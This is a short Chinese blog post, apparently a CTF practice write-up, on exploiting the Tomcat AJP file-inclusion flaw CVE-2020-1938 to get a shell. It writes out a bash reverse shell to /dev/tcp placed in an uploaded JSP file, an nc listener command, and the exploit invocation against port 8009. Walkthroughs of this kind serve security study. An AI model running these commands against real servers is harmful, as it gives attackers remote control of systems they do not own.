每日一练之"AJP漏洞Tomcat文件包含"
之前的新生赛也打过。。。
https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read
用到的是文件包含漏洞
准备工作
首先服务器的端口要打开。。。
http://www.jackson-t.ca/runtime-exec-payloads.html
在这编译下
bash -i >& /dev/tcp/服务器/端口号 0>&1
1 | <% |
替换中间的exec指令即可,保存为shell.txt
复现过程
在目标服务器上传shell.txt,然后需要知道上传的文件名
监听端口号
1 | nc -lvp 14888 |
替换下面指令
1 | python Tomcat-ROOT路径下文件包含(CVE-2020-1938).py -p 8009 -f /WEB-INF/uploads/???.txt 服务器 |
然后就getshell了
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 X Mεl0n | 随手记!